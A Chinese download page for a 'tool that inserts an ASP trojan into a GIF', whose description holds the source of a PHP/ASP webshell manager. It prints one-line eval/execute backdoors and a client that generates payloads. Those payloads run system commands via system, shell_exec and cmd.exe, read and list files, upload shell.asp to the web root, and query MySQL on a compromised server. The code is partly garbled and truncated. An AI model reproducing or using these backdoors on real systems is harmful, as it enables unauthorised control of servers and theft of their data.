登录 注册
当前位置:主页 > 资源下载 > 12 > 将asp木马插入gif中调用工具.exe下载

将asp木马插入gif中调用工具.exe下载

  • 更新:2024-06-27 14:29:14
  • 大小:15KB
  • 推荐:★★★★★
  • 来源:网友上传分享
  • 类别:网管软件 - 网络技术
  • 格式:EXE
文件下载

资源介绍

asp php 一起使用的SHELL 工具 <HTML><HEAD> <meta http-equiv="Content-Type" content="text/html; charset=gb2312"> <title>PHP+ASP</title> </HEAD> <style> <!-- td {font-size:8pt; color: #666666;font-family:Verdana} INPUT {font-size:9pt;BORDER-RIGHT: #cccccc 1px solid; BORDER-TOP: #cccccc 1px solid; BORDER-LEFT: #cccccc 1px solid; COLOR: #666666; BORDER-BOTTOM: #cccccc 1px solid; BACKGROUND-COLOR: #ffffff} textarea {font-size:9pt;BORDER-RIGHT: #cccccc 1px solid; BORDER-TOP: #cccccc 1px solid; BORDER-LEFT: #cccccc 1px solid; COLOR: #666666; BORDER-BOTTOM: #cccccc 1px solid; BACKGROUND-COLOR: #ffffff} select {font-size:9pt;BORDER-RIGHT: #cccccc 1px solid; BORDER-TOP: #cccccc 1px solid; BORDER-LEFT: #cccccc 1px solid; COLOR: #666666; BORDER-BOTTOM: #cccccc 1px solid; BACKGROUND-COLOR: #ffffff} BODY {font-size:9pt; color: #666666;font-family:Verdana; SCROLLBAR-FACE-COLOR: #ffffff; background color:#eeeeee;cursor:SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; SCROLLBAR-SHADOW-COLOR: #aaaaaa; SCROLLBAR-3DLIGHT-COLOR: #aaaaaa; SCROLLBAR-ARROW-COLOR: #dddddd; SCROLLBAR-TRACK-COLOR: #ffffff; SCROLLBAR-DARKSHADOW-COLOR: #ffffff } a:link {text-decoration:none; color:#336699} a:visited {text-decoration:none; color:#336699} a:active {text-decoration:none; color:#336699} a:hover {COLOR: #b4c8d8; } .tb {BORDER-RIGHT: #cccccc 1px solid; BORDER-TOP: #cccccc 1px solid; BORDER-LEFT: #cccccc 1px solid; BORDER-BOTTOM: #cccccc 1px solid;background-color:#cccccc} .tb0 {BORDER-RIGHT: #cccccc 1px solid; BORDER-TOP: #cccccc 1px solid; BORDER-LEFT: #cccccc 1px solid; BORDER-BOTTOM: #cccccc 1px solid;background-color:#fcfcfc} .tb1 {background-color:#ffffff} </style> --> </STYLE> <BODY 9pt" bgcolor="#cccccc">
lanker微型PHP+ASP管理器1.0双用版
<FORM name=frm method=post target=qq2>
木马地址: <INPUT size=60 value=http://127.0.0.1/up/nihao2.asp name=act id=act> 密码: <INPUT size=10 value=cmd name=para>生成器:<textarea rows='1' name='tmpcmd' cols='23'><?php eval($_POST[cmd];?></textarea></TD>
LANKER微型PHP后门服务端代码:
<?php eval($_POST[cmd]);?>

ASP后门服务端代码:
<%execute(request("cmd"))%>
<IFRAME border=1 height=340 width=580 name=qq2 marginwidth=0 marginheight=0 vspace=0 src="about:blank" frameborder=no scrolling=auto></IFRAME>
</form>
声明:此版为内部版,未经授权允许严禁传给他人和提供公开下载!谢谢合作!By lanker
</BODY></HTML> [removed] function showDiv(aa){ switch(aa) { case "1": yunxing[removed]="PHP环境变量<br>" yunxing[removed]+="

<INPUT type=button value='提 交' name=Send><br>








" break; case "3": yunxing[removed]="<p align='center'>执行函数:<select name='execfun'><option value='system' selected>system</option><option value='passthru'>passthru</option><option value='`'>特殊字符(`)</option><option value='shell_exec'>shell_exec</option><option value='exec'>exec</option><option value='popen'>popen</option></select><br><br><INPUT size=20 name=\\"cmdname\">
<INPUT type=button value='提 交' name=Send><br>








" break; case "4": yunxing[removed]="文件路径(不填为当前目录)<br><input type=text name='uploaddir' value='C:/Inetpub/wwwroot/shell.asp' size=20><p align='center'><input NAME='LanKerF' TYPE='file' size=13><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;frm.action=document.all.act.value;upfile();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br>asp的不用点浏览,<br><br>直接提交<br>然后就可以上传了<br>asp的必须带文件名<br><br>" break; case "5": yunxing[removed]="<p align='center'>文件名:<br><INPUT size=20 name=\\"duqu\">
<INPUT type=button value='提 交' name=Send><br>








" break; case "6": yunxing[removed]="<p align='center'>目录名:<br><INPUT size=20 name=\\"duqu\">
<INPUT type=button value='提 交' name=Send><br>








" break; case "7": yunxing[removed]="<p align='center'>文件1:<br><INPUT size=20 name=\\"file1\">
文件2:
<INPUT size=20 name=\"file2\"><br><INPUT type=button value='提 交' name=Send><br>








" break; case "8": yunxing[removed]="<p align='center'>文件1:<br><INPUT size=20 name=\\"file1\">
文件2:
<INPUT size=20 name=\"file2\"><br><INPUT type=button value='提 交' name=Send><br>








" break; case "9": yunxing[removed]="<p align='center'>文件名:<br><INPUT size=20 name=\\"filen\">
<INPUT type=button value='提 交' name=Send><br>








" break; case "10": yunxing[removed]="<p align='center'><textarea rows='12' name='duqu' cols='22'>phpinfo();</textarea>" yunxing[removed]+="<INPUT type=button value='提 交' name=Send><br>
字符转换工具:

要转换的字符:
<INPUT type=text name=\"inputstr\" size='23' ><br>转换后的字符:
<textarea cols='22' rows=\"4\" name=\"chrstr\" ></textarea>
<INPUT type=button name=strtxtdd value=\"转 换\" >" break; case "11": yunxing[removed]="主机:<input NAME=\\"servername\" TYPE=\"text\" value=\"localhost\" size=\"12\" >
数据库:<input NAME=\"dbname\" TYPE=\"text\" value size=\"10\" >  
用户名:<input NAME=\"dbusername\" TYPE=\"text\" value=\"root\" size=\"10\" > 
密码:<input NAME=\"dbpassword\" TYPE=\"text\" value size=\"12\" >  
SQL语句:
<textarea rows=\"8\" name=\"sql\" cols=\"20\" ></textarea>" yunxing[removed]+="
<INPUT type=button value='提 交' name=Send>" break; case "12": yunxing[removed]="<p align='center'>文件名:<INPUT size=14 name=\\"filen\">
文件内容:
<textarea rows=\"16\" name=\"filec\" cols=\"20\" ></textarea>
<INPUT type=button value='提 交' name=Send>" break; case "13": yunxing[removed]="<p align='center'>文件名:<br><INPUT size=20 name=\\"filen\">
<INPUT type=button value='提 交' name=Send><br>" break; case "14": yunxing[removed]="<p align='center'>目录名:<br><INPUT size=20 name=\\"dir\">
<INPUT type=button value='提 交' name=Send><br>








" break; case "15": yunxing[removed]="<p align='center'>目录名:<br><INPUT size=20 name=\\"dir\">
<INPUT type=button value='提 交' name=Send><br>








" break; } } function cmd(){ if(getString()) { if (frm.execfun.value =='`'){ frm.tmpcmd.value="$cmd=" frm.tmpcmd.value+=duqu(frm.cmdname.value) frm.tmpcmd.value+=";\n" frm.tmpcmd.value+="echo chr(60).chr(116).chr(101).chr(120).chr(116).chr(97).chr(114).chr(101).chr(97).chr(32).chr(99).chr(111).chr(108).chr(115).chr(61).chr(56).chr(48).chr(32).chr(114).chr(111).chr(119).chr(115).chr(61).chr(50).chr(54).chr(62);\n" frm.tmpcmd.value+="echo" frm.tmpcmd.value+=frm.execfun.value frm.tmpcmd.value+="$cmd" frm.tmpcmd.value+=frm.execfun.value frm.tmpcmd.value+=";\n" frm.tmpcmd.value+="echo chr(60).chr(47).chr(116).chr(101).chr(120).chr(116).chr(97).chr(114).chr(101).chr(97).chr(62);\n" } else{ frm.tmpcmd.value="$cmd=" frm.tmpcmd.value+=duqu(frm.cmdname.value) frm.tmpcmd.value+=";\n" frm.tmpcmd.value+="echo chr(60).chr(116).chr(101).chr(120).chr(116).chr(97).chr(114).chr(101).chr(97).chr(32).chr(99).chr(111).chr(108).chr(115).chr(61).chr(56).chr(48).chr(32).chr(114).chr(111).chr(119).chr(115).chr(61).chr(50).chr(54).chr(62);\n" frm.tmpcmd.value+="echo " frm.tmpcmd.value+=frm.execfun.value frm.tmpcmd.value+="($cmd);\n" frm.tmpcmd.value+="echo chr(60).chr(47).chr(116).chr(101).chr(120).chr(116).chr(97).chr(114).chr(101).chr(97).chr(62);\n" } } else { frm.tmpcmd.value="set objshell=server.createobject(\\\\\\\\"wscript.shell\")\n" frm.tmpcmd.value+="objshell.run(\"cmd.exe /c " frm.tmpcmd.value+=frm.cmdname.value frm.tmpcmd.value+=" > \"&Server;.MapPath(\".\")&\"\\25852.txt\")\n" frm.tmpcmd.value+="response.write \"<IFRAME height=340 width=580 src='25852.txt'></IFRAME>\"" } } function readfile(){ if(getString()) { frm.tmpcmd.value="$filename=" frm.tmpcmd.value+=duqu(frm.duqu.value) frm.tmpcmd.value+=";\n" frm.tmpcmd.value+="$s=chr(60).chr(112).chr(114).chr(101).chr(62);\n" frm.tmpcmd.value+="$e=chr(60).chr(47).chr(112).chr(114).chr(101).chr(62);\n" frm.tmpcmd.value+="$fp=@fopen($filename,r);\n" frm.tmpcmd.value+="$contents=@fread($fp, filesize($filename));\n" frm.tmpcmd.value+="@fclose($fp);\n" frm.tmpcmd.value+="$contents=htmlspecialchars($contents);\n" frm.tmpcmd.value+="echo $s.$contents.$e;\n" } else { frm.tmpcmd.value="function streamReadFromFile(thePath)\\\\\\\\n" frm.tmpcmd.value+="dim stream\n" frm.tmpcmd.value+="set stream=server.createObject(\"adodb.stream\")\n" frm.tmpcmd.value+="with stream\n" frm.tmpcmd.value+=".type=2\n" frm.tmpcmd.value+=".mode=3\n" frm.tmpcmd.value+=".open\n" frm.tmpcmd.value+="on error resume next\n" frm.tmpcmd.value+=".loadFromFile thePath\n" frm.tmpcmd.value+="chkErr err,\"文件无法被打开,请重试!\"\n" frm.tmpcmd.value+=".charset=\"gb2312\"\n" frm.tmpcmd.value+="chkErr err,\"编码类型错误!\"\n" frm.tmpcmd.value+=".Position=2\n" frm.tmpcmd.value+="streamReadFromFile=.readText()\n" frm.tmpcmd.value+=".close\n" frm.tmpcmd.value+="end with\n" frm.tmpcmd.value+="set stream=nothing\n" frm.tmpcmd.value+="end function\n" frm.tmpcmd.value+="response.write \"<textarea name=fileContent cols=70 rows=25 id=fileContent>\"&server;.htmlEncode(streamReadFromFile(\"" frm.tmpcmd.value+=frm.duqu.value frm.tmpcmd.value+="\"))&\"</textarea>\"\n" } } function readdir(){ if(getString()) { frm.tmpcmd.value="$dir=" frm.tmpcmd.value+=duqu(frm.duqu.value) frm.tmpcmd.value+=";\n" frm.tmpcmd.value+="$f = chr(60).chr(98).chr(114).chr(62);" frm.tmpcmd.value+="$dir=@dir($dir);" frm.tmpcmd.value+="if($dir) " frm.tmpcmd.value+="{" frm.tmpcmd.value+=" echo path_______.$dir->path.$f;" frm.tmpcmd.value+=" while($entry=$dir->read())" frm.tmpcmd.value+=" {" frm.tmpcmd.value+=" echo ____.$entry.$f; " frm.tmpcmd.value+=" }" frm.tmpcmd.value+=" $dir->close();" frm.tmpcmd.value+="}" frm.tmpcmd.value+="else" frm.tmpcmd.value+="{echo 0;}" } else { frm.tmpcmd.value="thePath=\\\\\\\\"" frm.tmpcmd.value+=frm.duqu.value frm.tmpcmd.value+="\"\ndim ext,flag,list,theHref,theFiles,fileName,theFolder,theFolders\n" frm.tmpcmd.value+="set fso=server.CreateObject(\"Scripting.filesystemobject\")\n" frm.tmpcmd.value+="set theFolder=fso.getFolder(thePath)\n" frm.tmpcmd.value+="set theFiles=theFolder.files\n" frm.tmpcmd.value+="set theFolders=theFolder.subFolders\n" frm.tmpcmd.value+="for each list in theFolders\n" frm.tmpcmd.value+="Response.Write list.path\n" frm.tmpcmd.value+="Response.Write \"
\"\n" frm.tmpcmd.value+="next\n" frm.tmpcmd.value+="for each list in theFiles\n" frm.tmpcmd.value+="Response.Write list.path\n" frm.tmpcmd.value+="Response.Write \"
\"\n" frm.tmpcmd.value+="next" } } function SQL(){ frm.tmpcmd.value="$message=chr(102).chr(97).chr(105).chr(108).chr(33);\\\\\\\\n" frm.tmpcmd.value+="$fgf=chr(32);\n" if(frm.dbpassword.value !=''){ frm.tmpcmd.value+="$dbpassword= " frm.tmpcmd.value+=duqu(frm.dbpassword.value) frm.tmpcmd.value+=";\n" } frm.tmpcmd.value+="$servername=" frm.tmpcmd.value+=duqu(frm.servername.value) frm.tmpcmd.value+=";\n" frm.tmpcmd.value+="$dbusername=" frm.tmpcmd.value+=duqu(frm.dbusername.value) frm.tmpcmd.value+=";\n" frm.tmpcmd.value+="$dbname=" frm.tmpcmd.value+=duqu(frm.dbname.value) frm.tmpcmd.value+=";\n" frm.tmpcmd.value+="$sql=" frm.tmpcmd.value+=duqu(frm.sql.value) frm.tmpcmd.value+=";\n" frm.tmpcmd.value+="@mysql_connect($servername,$dbusername,$dbpassword) or die($message);\n" frm.tmpcmd.value+="@mysql_select_db($dbname) or die($message);\n" frm.tmpcmd.value+="$sql=stripslashes($sql);\n" frm.tmpcmd.value+="$result = @mysql_query($sql);\n" frm.tmpcmd.value+="while($row=mysql_fetch_array($result,MYSQL_BOTH)){\n" frm.tmpcmd.value+="for($j=0;$j<input type=submit name=id value=上传></form>\"\n" frm.tmpcmd.value+="Session(\"M\")=\"dim i,j,info,stream,streamT,theFile,overWrite,fileContent\"&vbCrLf;&\"fileName=\"\"" frm.tmpcmd.value+=frm.uploaddir.value frm.tmpcmd.value+="\"\"\"&vbCrLf;&\"server.scriptTimeOut=5000\"&vbCrLf;&\"set stream=server.createObject(\"\"adodb.stream\"\")\"&vbCrLf;&\"set streamT=server.createObject(\"\"adodb.stream\"\")\"&vbCrLf;&\"with stream\"&vbCrLf;&\".type=1\"&vbCrLf;&\".mode=3\"&vbCrLf;&\".open\"&vbCrLf;&\".write request.binaryRead(request.totalBytes)\"&vbCrLf;&\".position=0\"&vbCrLf;&\"fileContent=.read()\"&vbCrLf;&\"i=instrB(fileContent,chrB(13)&chrB;(10))\"&vbCrLf;&\"info=leftB(fileContent,i-1)\"&vbCrLf;&\"i=len(info)+2\"&vbCrLf;&\"i=instrB(i,fileContent,chrB(13)&chrB;(10)&chrB;(13)&chrB;(10))+4-1\"&vbCrLf;&\"j=instrB(i,fileContent,info)-1\"&vbCrLf;&\"streamT.Type=1\"&vbCrLf;&\"streamT.Mode=3\"&vbCrLf;&\"streamT.Open\"&vbCrLf;&\"stream.position=i\"&vbCrLf;&\".copyTo streamT,j-i-2\"&vbCrLf;&\"streamT.saveToFile fileName,2\"&vbCrLf;&\"response.write \"\"文件上传成功\"\"\"&vbCrLf;&\"streamT.close\"&vbCrLf;&\".close\"&vbCrLf;&\"end with\"&vbCrLf;&\"set stream=nothing\"&vbCrLf;&\"set streamT=nothing\"" frm.submit(); } } function ascchar(){ frm.chrstr.value=duqu(frm.inputstr.value) } function info(){ if(getString()) { frm.tmpcmd.value="echo 服务器系统.chr(58);" frm.tmpcmd.value+="echo PHP_OS;" frm.tmpcmd.value+="echo chr(60).chr(98).chr(114).chr(62);" frm.tmpcmd.value+="echo 服务器操作系统文字编码.chr(58);" frm.tmpcmd.value+="echo $_SERVER[HTTP_ACCEPT_LANGUAGE];" frm.tmpcmd.value+="echo chr(60).chr(98).chr(114).chr(62);" frm.tmpcmd.value+="echo 服务器IP.chr(58);" frm.tmpcmd.value+="echo $_SERVER[SERVER_NAME];" frm.tmpcmd.value+="echo chr(60).chr(98).chr(114).chr(62);" frm.tmpcmd.value+="echo Web服务端口端口.chr(58);" frm.tmpcmd.value+="echo $_SERVER[SERVER_PORT];" frm.tmpcmd.value+="echo chr(60).chr(98).chr(114).chr(62);" frm.tmpcmd.value+="echo PHP运行方式.chr(58);" frm.tmpcmd.value+="echo strtoupper(php_sapi_name());" frm.tmpcmd.value+="echo chr(60).chr(98).chr(114).chr(62);" frm.tmpcmd.value+="echo PHP版本.chr(58);" frm.tmpcmd.value+="echo PHP_VERSION;" frm.tmpcmd.value+="echo chr(60).chr(98).chr(114).chr(62);" frm.tmpcmd.value+="echo 本文件路径.chr(58);" frm.tmpcmd.value+="echo $_SERVER[PATH_TRANSLATED];" } else { frm.tmpcmd.value="response.write \\\\\\\\"服务器名————\"&Request;.ServerVariables(\"SERVER_NAME\")\n" frm.tmpcmd.value+="response.write \"
服务器IP————\"&Request;.ServerVariables(\"LOCAL_ADDR\")\n" frm.tmpcmd.value+="response.write \"
服务器端口———\"&Request;.ServerVariables(\"SERVER_PORT\")\n" frm.tmpcmd.value+="response.write \"
服务器时间———\"&now;()\n" frm.tmpcmd.value+="response.write \"
本文件绝对路径—\"&server;.mappath(\".\")\n" frm.tmpcmd.value+="response.write \"
服务器CPU数量—-\"&Request;.ServerVariables(\"NUMBER_OF_PROCESSORS\")\n" frm.tmpcmd.value+="response.write \"
服务器操作系统—\"&Request;.ServerVariables(\"OS\")\n" } } [removed] [removed] function duqu(strcode){ var duqu=""; for(i=1;i
相关推荐

热门标签

资源声明

本站所有软件、应用、教程内容均由小编以及网友收集资料和整理而来,其著作权归原作者所有,仅供学习和研究使用,如有侵犯你版权的,请发邮箱jdjdokok@163.com指出,本站将立即改正。

酷码网  粤ICP备2024314634号